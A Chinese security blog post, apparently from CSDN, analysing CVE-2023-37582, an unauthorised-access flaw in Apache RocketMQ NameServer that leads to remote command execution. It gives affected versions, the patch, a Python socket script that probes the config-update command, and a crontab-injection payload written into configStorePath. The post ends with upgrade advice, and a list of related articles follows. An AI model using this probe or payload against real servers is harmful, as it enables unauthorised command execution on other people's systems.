RocketMq NameServer未授权访问导致远程代码执行(CVE-2023-37582)

最新推荐文章于 2024-12-30 19:58:59 发布
最新推荐文章于 2024-12-30 19:58:59 发布
阅读量3.7k 收藏 1
点赞数
文章标签: rocketmq CVE-2023-37582
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_42353842/article/details/131721421
版权

一、背景

RocketMQ是由阿里捐赠给Apache的一款低延迟、高并发、高可用、高可靠的分布式消息中间件,NameServer 为 Producer 和 Consumer 节点提供路由信息的组件。

在CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致在Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系统用户身份执行命令。

二、漏洞版本范围

Apache RocketMQ NameServer 5.0.0 ~ 5.1.1

Apache RocketMQ NameServer 4.0.0 ~ 4.9.6

三、漏洞分析

修复版本代码:

https://github.com/apache/rocketmq/pull/6843

 可以看到,补丁将configStorePathName修改为configStorePath。根据DawnT0wn师傅的分析:

https://xz.aliyun.com/t/12691

只需要使用UPDATE_NAMESRV_CONFIG(318)的更新功能,即可操纵RocketMq的body参数进行任意文件写入。由于RocketMq在5.1.1删除了FilterServerManager类,因此本漏洞只能通过向crontab写入定时任务,进行远程命令执行的漏洞利用。

四、漏洞测试

结合DawnT0wn以及afrog的nuclei插件:

https://github.com/zan8in/afrog/blob/3af7b0e363611480d533a43645eae57e37e3846b/pocs/temp/afrog-pocs/cve/CVE-2023-37582.yaml#L4

测试脚本如下:

import socket
import binascii

client = socket.socket()
client.settimeout(5)

client.connect((target_ip,target_port))
# make payload
json = '{"code":318,"extFields":{"test":"RockedtMQ"},"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')

body=('Thanks DawnT0wn').encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)
head1 = '00000000'+str(hex(json_lens))[2:]
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)

只要返回的data_recv中包含

{"code":0,"flag":1,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC"  字样,即表示RocketMq NameServer是未授权访问的,可能存在漏洞。

五、漏洞利用

由于body可控,我们可以在body内指定configStorePath=/var/spool/cron/root即可将RocketMq配置文件写入crontab文件中。

此外,由于crontab需要每一行开头以* * 类似的字符开始,不能出现其他字符,所以payload需要换行输入。我们可以将configStorePath赋值为:

/var/spool/cron/root\\n* * * * * whoami\n

以此向crotab写入可执行的定时命令。

六、漏洞修复

升级RocketMQ到 4.9.7 或 5.1.2 或更高版本

一苇sec
关注
主流软件漏洞跟踪 Apache RocketMQ NameServer 远程代码执行漏洞CVE-2023-37582
简简单单Onlinezuozuo
08-29 477
主流软件漏洞跟踪 Apache RocketMQ NameServer 远程代码执行漏洞CVE-2023-37582
Apache RocketMQ远程命令执行漏洞CVE-2023-37582
holyxp的博客
07-14 4058
Apache RocketMQ是一款开源的分布式消息和流处理平台,提供高效、可靠、可扩展的低延迟消息和流数据处理能力,广泛用于异步通信、应用解耦、系统集等场景。加密货币行业有大量平台采用此产品用来处理消息服务,注意风险。当RocketMQNameServer组件暴露在外网时,并且缺乏有效的身份认证机制时,攻击者可以利用更新配置功能,以RocketMQ运行的系统用户身份执行命令。7.12日Apache RocketMQ发布严重安全提醒,披露远程命令执行漏洞CVE-2023-37582
Apache RocketMQ 命令注入漏洞(含批量验证poc),劲爆
2401_83974173的博客
04-13 731
漏洞存在于Apache RocketMQ中,是一个远程命令执行漏洞RocketMQNameServer、Broker、Controller等多个组件缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
CVE-2023-37582 Apache RocketMQ 更新配置远程代码执行漏洞
LJQClqjc的博客
07-20 617
RocketMQ 5.1.1及以上版本中,当RocketMQNameServer暴露在外网且缺乏权限验证时,恶意攻击者可以通过未授权访问利用更新配置功能以RocketMQ运行的系统用户身份上传含有特定内容的文件到任意目录。对这两个补丁进行分析发现,两个补丁分别是对不同版本的rocketmq进行修复,这里仅介绍5.1.1版本的修复补丁,补丁代码逻辑一致分别涉及NameServer、Broker、Controller组件,都是禁止修改相关配置文件路径。该文件权限是rocketmq启动时的用户权限。
漏洞复现-Apache RocketMQ 远程命令执行漏洞CVE-2023-33246)
玄道的网安博客
08-11 1208
RocketMQNameServer、Broker、Controller等多个组件缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。进入for循环后在 org.apache.rocketmq.broker.filtersrv.FilterServerUtil 中给的 callshell 方法去执行命令。72行调用方法 buildStartCommand。该中间件本来就是每30秒执行一次,漏洞产生的就是修改了配置文件,变量被赋值为了恶意命令,导致了命令执行。
CVE-2023-37582 Apache RocketMQ 远程代码执行漏洞
蚁景网安学院
07-31 795
漏洞简介Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系统用户身份执行命令。影响版本Apache RocketMQ <= 5.1.1Apach...
Apache RocketMQ NameServer 远程代码执行漏洞CVE-2023-37582)分析
Yb528970805的博客
09-07 791
最后的返回的realStorePath在这里赋值,storePathFiled是一个Field实例化的类,这个类是用于反射的,看到它时configStorePath字段,所以这里全是就是获取的其实是storePathObject中configStorePath的值。这些都是我们在RocketMQ的协议中的body可以控制的,并且没有被过滤,过滤的properties为configStorePathName。最近,阿里云又发布了RocketMQ漏洞通告,因为才分析过这个漏洞,所以再来看一下。
未授权访问漏洞
最新发布
mirliasheong的博客
12-30 1688
攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感⽂件进⾏修改,最终完全控制服务器。漏洞信息:Kibana如果允许外⽹访问且没有做安全登录认证,就会被外部任意访问,查看所有数据,造成数据泄露。漏洞信息:Elasticsearch服务普遍存在⼀个未授权访问的问题,攻击者通常可以请求⼀个开放9200或9300的服务器进⾏恶意攻击。在使用-H参数连接⽬标主机的docker,使⽤ps命令查询⽬标系统运行的镜像。
Apache RocketMQ 远程代码执行漏洞CVE-2023-37582
蚁景网安学院
07-31 1006
Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中,由于对 CVE-2023-33246 修复不完善,导致Apache RocketMQ NameServer 存在未授权访问的情况下,攻击者可构造恶意请求以RocketMQ运行的系统用户身份执行命令。
Apache RocketMQ远程代码执行
hackzkaq的博客
10-09 552
Apache RocketMQ是一个分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点。RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQNameServer(9876端口)、Broker(10911端口)、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。
rocketmq-console控制台(已改造,可直接使用)
09-28
说明:已经完成改造,jar文件,下载后java -jar命令即可直接启动 rocketmq-console版本:2.0 对应的rocketmq版本:4.7.1 访问控制台的网址:127.0.0.1:17890 rocketmq默认地址:127.0.0.1:9876
CVE-2023-37582 Apache RocketMQ NameServer远程代码执行漏洞
mirocky的博客
12-21 1110
我感觉就是一个任意文件写入,毕竟利用需要受害者去执行,所以CVE漏洞报告原文中也用的是"possible when using update"这种含糊不清的字眼。与CVE-2023-33246的修复相比,增加了configStorePath黑名单关键字。python3脚本执行。
Apache ActiveMQ 管理员控制台未授权访问(开启身份验证并修改管理用户名和密码)
weixin_43135696的博客
01-26 3018
漏洞概述:   Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。   Apache ActiveMQ管理控制台的默认管理用户名和密码分别为admin和admin,用户可以未经授权使用默认凭据直接访问服务器,导致敏感信息泄露,并进一步进行攻击。 修复方法 1、编辑 ${ACTIVEMQ_HOME}/conf/jetty.xml开启身份验证,将authenticate属性改为true: &lt.
【高危】RocketMQ NameServer存在远程代码执行漏洞(PoC)
murphysec的博客
07-24 596
RocketMQ 是一个开源的分布式消息中间件,NameServer 为 Producer 和 Consumer 节点提供路由信息的组件。
记录一次RocketMq漏洞
qq_39939541的博客
11-15 1355
记录一下mq重协商漏洞
作为黑客你知道这些漏洞吗?Apache RocketMQ 命令注入
2301_79765783的博客
09-14 432
RocketMQ 5.1.0及以下版本,在一定条件下,存在远程命令执行风险。RocketMQNameServer、Broker、Controller等多个组件外网泄露,缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。我们看到真正有危险的操作应该是与 10911 进行通信的操作,没有进行身份验证和加密传输,同时带入了命令执行的参数。根据从 Wireshark 中抓取的数据包 我们也可以构造这样的 payload 触发漏洞。投稿邮箱:edu@antvsion。
RocketMQ 的认证与授权机制
FireFox1997
08-05 1262
Apache RocketMQ 是一个高性能、高吞吐量、分布式的消息中间件,广泛应用于异步通信、应用解耦、流量削峰等场景。在企业级应用中,消息安全尤为重要,本文将深入探讨 RocketMQ 的认证与授权机制,帮助开发者和系统管理员更好地理解和使用 RocketMQ 的安全特性。
mq控制台里的访问漏洞和springboot的漏洞
jockha的博客
05-05 741
rocketmq.config.loginRequired=true endpoints.enabled = false
CVE-2023-37582
07-28
回答: CVE-2023-37582是一个安全漏洞,由于对CVE-2023-33246修复不完善,在Apache RocketMQ NameServer存在未授权访问的情况下,攻击者可以构造恶意请求以RocketMQ运行的系统用户身份执行命令。\[1\]你可以在https://github.com/zan8in/afrog/blob/3af7b0e363611480d533a43645eae57e37e3846b/pocs/temp/afrog-pocs/cve/CVE-2023-37582.yaml#L4找到相关的测试脚本\[2\]\[3\]。 #### 引用[.reference_title] - *1* *2* *3* [RocketMq NameServer未授权访问导致远程代码执行CVE-2023-37582)](https://blog.youkuaiyun.com/weixin_42353842/article/details/131721421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值